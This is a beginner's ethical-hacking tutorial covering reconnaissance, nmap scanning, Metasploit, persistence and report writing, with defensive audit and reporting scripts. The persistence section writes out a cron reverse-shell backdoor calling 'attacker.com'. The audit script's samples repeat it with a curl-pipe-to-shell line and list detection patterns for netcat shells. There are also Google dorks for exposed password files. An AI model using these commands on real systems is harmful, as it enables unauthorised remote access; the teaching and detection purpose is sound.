Ethical Hacking Explained — Beginner's Guide
Ethical hacking is the authorized practice of probing systems for vulnerabilities to identify and fix security weaknesses before malicious attackers can exploit them.
What You’ll Learn
By the end of this tutorial, you’ll understand the five phases of ethical hacking, learn basic nmap scanning techniques, grasp Metasploit concepts, and know how to write a professional penetration testing report.
Why Ethical Hacking Matters
Every major tech company employs ethical hackers. In 2025, bug bounty programs paid out over $100 million to ethical hackers worldwide. At DodaTech, our security team uses ethical hacking techniques to test Durga Antivirus Pro and Doda Browser before each release. Understanding ethical hacking helps you think like an attacker so you can defend more effectively.
Ethical Hacking Learning Path
flowchart LR
A[Security Basics] --> B[Network Security]
B --> C[Web Security]
C --> D[Cryptography]
D --> E[Ethical Hacking]
E --> F[Pen Testing]
E --> G{You Are Here}
style G fill:#f90,color:#fff
What Is Ethical Hacking? (The “Why” First)
Think of ethical hacking like hiring someone to try to break into your house so you can fix the weak spots. A regular burglar breaks in to steal. An ethical hacker breaks in (with permission) to show you how they did it so you can improve your locks, alarms, and cameras.
The key difference between ethical and malicious hacking is authorization. Ethical hackers:
- Get written permission before testing
- Follow a defined scope (what to test, what not to test)
- Report all findings to the organization
- Never exploit vulnerabilities beyond what’s necessary to prove the risk
- Destroy all data collected during testing
The Five Phases of Ethical Hacking
flowchart LR
A[Reconnaissance] --> B[Scanning]
B --> C[Gaining Access]
C --> D[Maintaining Access]
D --> E[Reporting]
A --> F{Phase 1}
B --> G{Phase 2}
C --> H{Phase 3}
D --> I{Phase 4}
E --> J{Phase 5}
style F fill:#f90,color:#fff
style G fill:#f90,color:#fff
style H fill:#f90,color:#fff
style I fill:#f90,color:#fff
style J fill:#f90,color:#fff
Phase 1: Reconnaissance (Information Gathering)
Reconnaissance is the research phase. You’re gathering information about the target without directly interacting with their systems. Think of it like a detective gathering clues before approaching a suspect.
Passive Reconnaissance
You gather information from publicly available sources without touching the target’s systems:
# WHOIS lookup — find domain registration info
whois example.com
# DNS enumeration — find subdomains and IP addresses
# (many resolvers now answer ANY with a minimal reply; if so, query A, MX, NS and TXT separately)
dig example.com ANY
nslookup example.com
# The Harvester — email and subdomain discovery
theHarvester -d example.com -b google
# Shodan — find exposed devices and services
# (Use the website: shodan.io)

What You Can Learn
From passive recon alone, you can discover:
- Employee names and email addresses (LinkedIn, company website)
- Technology stack (Wappalyzer, BuiltWith)
- Subdomains and IP ranges (DNS records)
- Exposed documents and sensitive files (Google dorking)
- Social media presence and employee behavior
Google Dorking — Finding Secrets via Search
Google dorking uses advanced search operators to find exposed information:
# Find exposed password files
site:example.com filetype:txt password
# Find configuration files
site:example.com filetype:env
# Find login pages
site:example.com inurl:admin
# Find exposed directories
intitle:"index of" site:example.com

Active Reconnaissance
Now you directly interact with the target but in a non-invasive way:
# Ping sweep — find live hosts
ping -c 1 192.168.1.1
# Simple port scan with nc
nc -zv 192.168.1.1 22
nc -zv 192.168.1.1 80

Phase 2: Scanning (Finding Open Doors)
Scanning is where you actively probe the target to discover open ports, running services, and potential vulnerabilities. This is the most technical phase and uses specialized tools.
nmap — The Swiss Army Knife of Scanning
# nmap (Network Mapper) is the most popular scanning tool
# Basic scan — check if host is up and scan top 1000 ports
nmap 192.168.1.1
# Scan specific ports
nmap -p 22,80,443 192.168.1.1
# Service version detection — find out which software is running
nmap -sV 192.168.1.1
# OS detection
nmap -O 192.168.1.1
# Aggressive scan (OS + version + scripts + traceroute)
nmap -A 192.168.1.1
# Scan entire subnet for live hosts
nmap -sn 192.168.1.0/24
# Full scan with all ports (1-65535)
nmap -p- 192.168.1.1

Expected nmap output:
Starting Nmap 7.94 ( https://nmap.org ) at 2026-06-06 10:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.9p1 Ubuntu
80/tcp   open   http       Apache httpd 2.4.57
443/tcp  open   https      Apache httpd 2.4.57
3306/tcp closed mysql
8080/tcp open   http-proxy Squid proxy 6.0
MAC Address: 00:1A:2B:3C:4D:5E (Router Manufacturer)
Device type: general purpose
Running: Linux 5.x
OS details: Linux 5.15 - 5.19

Vulnerability Scanning
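Before you run vulnerability scripts against the services you found, it helps to have the scan results in structured form so nothing is missed and the open services can go straight into the report. The parser below is an added example written for this tutorial, not code from the original page or from the nmap project. It reads nmap's normal (-oN) output format, using the sample scan report shown above as constructed input so it runs offline, counts ports by state as a sanity check, and applies a few illustrative triage rules (assumptions, not a vulnerability database) to the open services a tester or defender would want to confirm first.

```python
"""Parse nmap normal-format output into a service inventory.

Added example, not from the original tutorial or the nmap project. The input
below is the sample scan report shown earlier on this page, embedded as a
constructed string so the script runs offline; in practice read the file
written by `nmap -sV -oN scan.txt <target>`.
"""
import re
from dataclasses import dataclass

# Constructed sample: the nmap -sV report shown above.
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2026-06-06 10:00 UTC
Nmap scan report for 192.168.1.1
Host is up (0.0012s latency).
PORT     STATE  SERVICE    VERSION
22/tcp   open   ssh        OpenSSH 8.9p1 Ubuntu
80/tcp   open   http       Apache httpd 2.4.57
443/tcp  open   https      Apache httpd 2.4.57
3306/tcp closed mysql
8080/tcp open   http-proxy Squid proxy 6.0
MAC Address: 00:1A:2B:3C:4D:5E (Router Manufacturer)
"""

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)(?:\s+(.*))?$")


@dataclass
class Service:
    host: str
    port: int
    proto: str
    state: str
    name: str
    version: str  # empty when nmap printed no version banner


def parse_nmap(text):
    """Return one Service per port line, tagged with the host it belongs to."""
    host, services = None, []
    for line in text.splitlines():
        m = HOST_LINE.match(line)
        if m:
            host = m.group(1)  # a multi-host scan has several of these lines
            continue
        m = PORT_LINE.match(line)
        if m and host:
            port, proto, state, name, version = m.groups()
            services.append(Service(host, int(port), proto, state, name,
                                    (version or "").strip()))
    return services


def state_counts(services):
    """e.g. {'open': 4, 'closed': 1}: a quick sanity check against the scan."""
    counts = {}
    for s in services:
        counts[s.state] = counts.get(s.state, 0) + 1
    return counts


# Illustrative triage rules (assumptions, not a vulnerability database): the
# open services a tester or defender should confirm before rating risk.
def triage(services):
    """Return (port, note) pairs for open services that need a closer look."""
    notes = []
    for s in services:
        if s.state != "open":
            continue
        if s.name == "http":
            notes.append((s.port, "cleartext HTTP; confirm it redirects to HTTPS or is intended"))
        elif s.name == "http-proxy":
            notes.append((s.port, "proxy exposed; verify it is not an open proxy"))
        if not s.version:
            notes.append((s.port, "no version banner; identify the software manually"))
    return notes


if __name__ == "__main__":
    inventory = parse_nmap(SAMPLE_NMAP_OUTPUT)
    print(state_counts(inventory))
    for svc in inventory:
        print(f"{svc.host}:{svc.port}/{svc.proto} {svc.state:<6} {svc.name:<11} {svc.version}")
    for port, note in triage(inventory):
        print(f"[!] port {port}: {note}")
```

The host and port regexes cover the normal output format only; for scans saved with -oX, parse the XML instead of adapting these patterns.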
After discovering services, you check them for known vulnerabilities:
# nmap NSE (Nmap Scripting Engine) — vulnerability scripts
nmap --script vuln 192.168.1.1
# Check for specific vulnerabilities
nmap --script http-sql-injection 192.168.1.1
nmap --script ssl-enum-ciphers 192.168.1.1
# Nikto — web server scanner
nikto -h http://192.168.1.1

Phase 3: Gaining Access (The Exploitation Phase)
Exploitation is where you actually break in. This is the most technical and most regulated phase. Only attempt this on systems you own or have explicit permission to test.
Metasploit — The Exploitation Framework
Metasploit is like a toolkit for building and running exploits. Think of it as a library of pre-built “lock picks” for various security vulnerabilities.
# Start Metasploit console
msfconsole
# Once inside msfconsole:
msf6 > search apache
# Select an exploit module
msf6 > use exploit/multi/http/apache_normalize_path
# View options
msf6 exploit(apache_normalize_path) > show options
# Set target
msf6 exploit(apache_normalize_path) > set RHOSTS 192.168.1.1
msf6 exploit(apache_normalize_path) > set RPORT 80
# Run the exploit
msf6 exploit(apache_normalize_path) > run

What Happens During Exploitation
- Metasploit sends a specially crafted payload to the target
- If the target is vulnerable, the payload executes
- A connection is established (called a “shell” or “meterpreter”)
- The attacker can now execute commands on the target
# Conceptual example of what an exploit payload does
# THIS IS FOR EDUCATIONAL PURPOSES ONLY
import socket


def exploit_concept(target_ip, target_port):
    """Conceptual demonstration of sending a payload."""
    payload = b"A" * 200 + b"\x90\x90\x90"  # Overflow + NOP sled
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect((target_ip, target_port))
    sock.sendall(payload)  # sendall() keeps sending until the whole payload is out
    response = sock.recv(4096)
    print(f"Response: {response}")
    sock.close()

Phase 4: Maintaining Access (Persistence)
Once you’ve gained access, maintaining access ensures you can return. In ethical hacking, this phase demonstrates how attackers establish persistence — backdoors, cron jobs, and hidden accounts.
Common Persistence Techniques
- Backdoors: A program that listens on a port and provides access
- Cron jobs: Scheduled tasks that periodically reconnect
- SSH keys: Adding an authorized key for permanent access
- Web shells: A script on the web server that accepts commands
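From the defender's side, the same list is a checklist of where to look. The script below is an added example written for this tutorial, not part of the original page; it audits crontab entries for the reverse-shell and download-and-run patterns behind the cron and backdoor techniques listed above, and compares an authorized_keys file against a known-good baseline to spot keys that were added. All input lines are constructed samples (the first cron line reproduces the page's own conceptual cron backdoor, the key bodies are placeholders, and the indicator patterns are illustrative rather than a complete rule set); on a real host you would feed it the output of crontab -l and the contents of ~/.ssh/authorized_keys.

```python
"""Audit cron entries and SSH authorized_keys for persistence indicators.

Added example, not from the original tutorial. All inputs are constructed
samples; the indicator patterns are illustrative, not a complete rule set.
"""
import re

# Constructed crontab lines: the page's backdoor example plus legitimate jobs.
SAMPLE_CRONTAB = [
    "*/5 * * * * nc -e /bin/bash attacker.com 4444",
    "0 3 * * * /usr/bin/certbot renew --quiet",
    "*/10 * * * * curl -s http://203.0.113.5/update.sh | sh",
    "@daily /usr/sbin/logrotate /etc/logrotate.conf",
]

# Constructed authorized_keys content. Key bodies are placeholders, not real keys.
BASELINE_KEYS = [
    "ssh-ed25519 AAAA-CONSTRUCTED-KEY-1 alice@laptop",
    "ssh-rsa AAAA-CONSTRUCTED-KEY-2 deploy@ci",
]
CURRENT_KEYS = [
    "ssh-ed25519 AAAA-CONSTRUCTED-KEY-1 alice@laptop",
    "ssh-rsa AAAA-CONSTRUCTED-KEY-2 deploy@ci",
    "ssh-ed25519 AAAA-CONSTRUCTED-KEY-3",  # key added outside the baseline, no comment
]

# (rule name, pattern) pairs describing what a persistence job tends to look like.
CRON_INDICATORS = [
    ("netcat-exec", re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\s")),
    ("dev-tcp-redirect", re.compile(r"/dev/(tcp|udp)/")),
    ("piped-download", re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z|da)?sh\b")),
    ("decode-and-run", re.compile(r"base64\s+(-d|--decode)")),
]


def split_cron(line):
    """Separate the schedule from the command ('@reboot cmd' or five fields + cmd)."""
    line = line.strip()
    parts = line.split(None, 1) if line.startswith("@") else line.split(None, 5)
    if len(parts) < 2:
        return line, ""
    return " ".join(parts[:-1]), parts[-1]


def find_suspicious_cron(lines):
    """Return (schedule, command, rule) for every entry matching an indicator."""
    hits = []
    for line in lines:
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # blank lines and comments carry no command
        schedule, command = split_cron(line)
        for rule, pattern in CRON_INDICATORS:
            if pattern.search(command):
                hits.append((schedule, command, rule))
                break  # one report per entry is enough
    return hits


KEY_TYPES = ("ssh-", "ecdsa-", "sk-")


def key_identity(line):
    """Return (type, key) for an authorized_keys line, ignoring options and comment."""
    parts = line.split()
    if parts and not parts[0].startswith(KEY_TYPES):
        parts = parts[1:]  # leading options field such as command="..." or no-pty
    if len(parts) < 2:
        return None
    return parts[0], parts[1]


def find_unknown_keys(current, baseline):
    """Return current authorized_keys lines whose key is not in the baseline."""
    known = {key_identity(k) for k in baseline}
    return [line for line in current
            if key_identity(line) is not None and key_identity(line) not in known]


if __name__ == "__main__":
    for schedule, command, rule in find_suspicious_cron(SAMPLE_CRONTAB):
        print(f"[!] cron ({rule}): {schedule} -> {command}")
    for line in find_unknown_keys(CURRENT_KEYS, BASELINE_KEYS):
        print(f"[!] authorized_keys entry not in baseline: {line}")
```

The baseline comparison ignores the comment field on purpose: an attacker can label a key anything, so only the key material identifies it. Run the audit for every account that has a crontab or an authorized_keys file, not just root.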
# Linux backdoor via cron job (conceptual)
echo "*/5 * * * * nc -e /bin/bash attacker.com 4444" > cronjob
crontab cronjob # This runs every 5 minutes

Phase 5: Reporting (The Most Important Phase)
Reporting is what separates ethical hackers from malicious ones. A professional report documents every finding with:
- Executive summary — for non-technical stakeholders
- Technical findings — detailed vulnerability descriptions
- Proof of concept — how the vulnerability was exploited
- Risk rating — severity of each finding
- Remediation steps — how to fix each issue
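A report with this structure is easy to produce from structured notes, which also guarantees that the counts in the executive summary match the findings section. The generator below is an added example written for this tutorial, not code from the original page. Its severity labels follow the CVSS v3.x qualitative scale (Low 0.1-3.9, Medium 4.0-6.9, High 7.0-8.9, Critical 9.0-10.0), findings are ordered by score so the worst appears first, and the findings it renders are constructed sample data, the first of them reproducing the SQL injection finding from the sample report that follows.

```python
"""Generate a penetration test report from structured findings.

Added example, not from the original tutorial. Findings are constructed
sample data; the first reproduces the page's sample SQL injection finding.
"""
from collections import Counter
from dataclasses import dataclass

# CVSS v3.x qualitative severity scale, highest first.
SEVERITY_ORDER = ["Critical", "High", "Medium", "Low", "None"]


@dataclass
class Finding:
    title: str
    cvss: float
    location: str
    impact: str
    remediation: str
    proof: str = "[screenshots and request logs]"


SAMPLE_FINDINGS = [
    Finding("Cleartext HTTP Exposed", 5.3, "port 80",
            "Login credentials travel unencrypted",
            "Redirect HTTP to HTTPS and enable HSTS"),
    Finding("SQL Injection in Login Form", 9.8, "/login endpoint, username parameter",
            "Full database read/write access",
            "Use parameterized queries (see Web Security tutorial)"),
    Finding("Verbose Server Banner", 3.1, "HTTP Server header",
            "Reveals the exact web server version",
            "Suppress version details in the Server header"),
]


def rate(cvss):
    """Map a CVSS v3.x base score to its qualitative severity."""
    if not 0.0 <= cvss <= 10.0:
        raise ValueError(f"CVSS score out of range: {cvss}")
    if cvss >= 9.0:
        return "Critical"
    if cvss >= 7.0:
        return "High"
    if cvss >= 4.0:
        return "Medium"
    if cvss > 0.0:
        return "Low"
    return "None"


def summarize(findings):
    """Count findings per severity, e.g. {'Critical': 1, 'Medium': 1}."""
    return Counter(rate(f.cvss) for f in findings)


def executive_summary(client, findings):
    """One paragraph for non-technical readers, derived from the findings themselves."""
    counts = summarize(findings)
    parts = [f"{counts[s]} {s.lower()}-severity" for s in SEVERITY_ORDER if counts[s]]
    top = max(findings, key=lambda f: f.cvss)
    return (f"{client}'s web application has {', '.join(parts)} "
            f"finding(s). The most critical is {top.title} ({top.location}).")


def render_report(client, date, tester, findings, methodology):
    """Return the report as Markdown, findings ordered by CVSS score descending."""
    ordered = sorted(findings, key=lambda f: f.cvss, reverse=True)
    lines = [
        "# Penetration Test Report",
        f"Client: {client}", f"Date: {date}", f"Tester: {tester}", "",
        "## Executive Summary", executive_summary(client, findings), "",
        "## Findings",
    ]
    for n, f in enumerate(ordered, 1):
        lines += [
            f"### Finding {n}: {f.title}",
            f"- **Severity**: {rate(f.cvss)} (CVSS {f.cvss})",
            f"- **Location**: {f.location}",
            f"- **Impact**: {f.impact}",
            f"- **Proof**: {f.proof}",
            f"- **Remediation**: {f.remediation}",
            "",
        ]
    lines += ["## Methodology"] + [f"- {m}" for m in methodology]
    return "\n".join(lines)


if __name__ == "__main__":
    print(render_report("Example Corp", "June 2026", "Jane Doe, Ethical Hacker",
                        SAMPLE_FINDINGS,
                        ["External black-box testing",
                         "Tools: nmap, Burp Suite, Metasploit, custom scripts",
                         "Duration: 5 days"]))
```

Keeping the proof field as a placeholder in the data model is deliberate: screenshots and request logs are attached to the report, while the findings list itself stays free of sensitive captured data and can be shared more widely.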
Sample Report Structure
# Penetration Test Report
Client: Example Corp
Date: June 2026
Tester: Jane Doe, Ethical Hacker
## Executive Summary
Example Corp's web application has 3 high-severity and 5 medium-severity
vulnerabilities. The most critical is an SQL injection in the login form
that allows full database access.
## Critical Findings
### Finding 1: SQL Injection in Login Form
- **Severity**: Critical (CVSS 9.8)
- **Location**: /login endpoint, username parameter
- **Impact**: Full database read/write access
- **Proof**: [screenshots and request logs]
- **Remediation**: Use parameterized queries (see Web Security tutorial)
## Methodology
- External black-box testing
- Tools: nmap, Burp Suite, Metasploit, custom scripts
- Duration: 5 days

Common Ethical Hacking Mistakes
1. Testing Without Permission
Never test a system without explicit written authorization. This is illegal and can result in criminal charges. Always get a signed scope of work document.
2. Going Beyond Scope
If the contract says “test the web application,” don’t test the employee Wi-Fi or the CEO’s laptop. Stick to the agreed boundaries.
3. Not Documenting Everything
If you didn’t document it, it didn’t happen. Keep detailed notes of every command, every finding, and every result. Screenshots are essential.
4. Using Every Exploit Without Understanding
Running exploits without understanding them can crash systems. Know what each exploit does before running it. This is why tools like Metasploit include descriptions and risk ratings.
5. Not Securing Testing Data
The data you collect during testing (passwords, personal information, system configs) is sensitive. Encrypt it, store it securely, and destroy it after the report is delivered.
6. Ignoring Web Application Testing
Many ethical hackers focus on network scanning and miss the most common attack vector — web applications. Always test both network and application layers.
7. Poor Communication
If a critical vulnerability is found during testing, don’t wait for the final report. Notify the client immediately so they can start fixing it.
Common Mistakes Beginners Make
1. Skipping the Fundamentals
Many beginners jump straight to advanced topics without mastering the basics. Take time to understand the core concepts before moving on.
2. Not Practicing Enough
Reading tutorials without writing code leads to shallow understanding. Code along with every example and experiment on your own.
3. Ignoring Error Messages
Error messages tell you exactly what went wrong. Read them carefully — they usually point to the line and type of issue.
4. Copy-Pasting Without Understanding
It’s tempting to copy code from tutorials, but typing it yourself and understanding each line builds real skill.
5. Giving Up Too Early
Every developer hits frustrating bugs. Take breaks, ask for help, and remember that struggling is part of learning.
Practice Questions
1. What’s the difference between ethical and malicious hacking?
Ethical hacking is authorized, follows a defined scope, and produces a report to help improve security. Malicious hacking is unauthorized and aims to cause harm or personal gain.
2. What information can you gather during passive reconnaissance?
Domain registration details, DNS records, employee email addresses, technology stack, subdomains, exposed documents, and social media information.
3. What does nmap -sV do?
It performs service version detection — identifying which specific software versions are running on open ports (e.g., Apache 2.4.57 instead of just “HTTP”).
4. What is Metasploit used for?
Metasploit is a framework for developing and executing exploit code against remote targets. It includes thousands of pre-built exploits, payloads, and auxiliary modules.
5. Challenge: Run a simple nmap scan on your local machine or router and identify three open ports.
nmap localhost
# Expected output will vary, but common open ports include:
# 22/tcp (SSH), 80/tcp (HTTP), 443/tcp (HTTPS)

Real-World Task: Network Reconnaissance Lab
Create a safe scanning lab environment:
# Set up a test target using Docker
# (the container's port 80 is published on host port 8080)
docker run -d --name vulnerable-web -p 8080:80 vulnerables/web-dvwa
# Scan your test target on the published port
nmap -sV -p 8080 localhost
# Expected output:
# PORT     STATE SERVICE VERSION
# 8080/tcp open  http    Apache httpd 2.4.57
# Now scan with vulnerability scripts
# (quote the pattern so the shell does not expand the * against files in the current directory)
nmap --script "http-vuln*" -p 8080 localhost

This lab setup gives you a legal environment to practice. The DVWA (Damn Vulnerable Web Application) container is intentionally vulnerable and designed for learning. Durga Antivirus Pro uses similar scanning techniques in its network protection module to detect vulnerable services on connected devices.
Try It Yourself
Write a Python script that performs a basic port scan (like a simplified nmap):
# simple_port_scanner.py
# ONLY use on systems you own or have permission to test!
import socket
import sys


def scan_port(host, port, timeout=1):
    """Attempt a TCP connect to host:port; return (is_open, service_name_or_error)."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(timeout)
        result = sock.connect_ex((host, port))  # 0 means the connection succeeded
        sock.close()
        if result == 0:
            try:
                service = socket.getservbyport(port, "tcp")  # name from the local services table
            except OSError:
                service = "unknown"
            return True, service
        return False, None
    except Exception as e:
        return False, str(e)


def main():
    if len(sys.argv) < 3:
        print("Usage: python simple_port_scanner.py <host> <port1,port2,...>")
        print("Example: python simple_port_scanner.py scanme.nmap.org 22,80,443")
        sys.exit(1)
    host = sys.argv[1]
    ports = [int(p) for p in sys.argv[2].split(",")]
    print(f"[*] Scanning {host} for {len(ports)} port(s)...")
    print(f"{'Port':<8} {'State':<8} {'Service'}")
    print("-" * 30)
    for port in ports:
        is_open, service = scan_port(host, port)
        state = "OPEN" if is_open else "CLOSED"
        svc = service if service else "-"
        print(f"{port:<8} {state:<8} {svc}")


if __name__ == "__main__":
    main()

Expected output:
[*] Scanning scanme.nmap.org for 3 port(s)...
Port     State    Service
------------------------------
22       OPEN     ssh
80       OPEN     http
443      CLOSED   -

What’s Next
Congratulations on completing this Ethical Hacking tutorial! Here’s where to go from here:
- Practice daily — Consistency is more important than long study sessions
- Build a project — Apply what you learned by building something real
- Explore related topics — Check out other tutorials in the same category
- Join the community — Discuss with other learners and share your progress
Remember: every expert was once a beginner. Keep coding!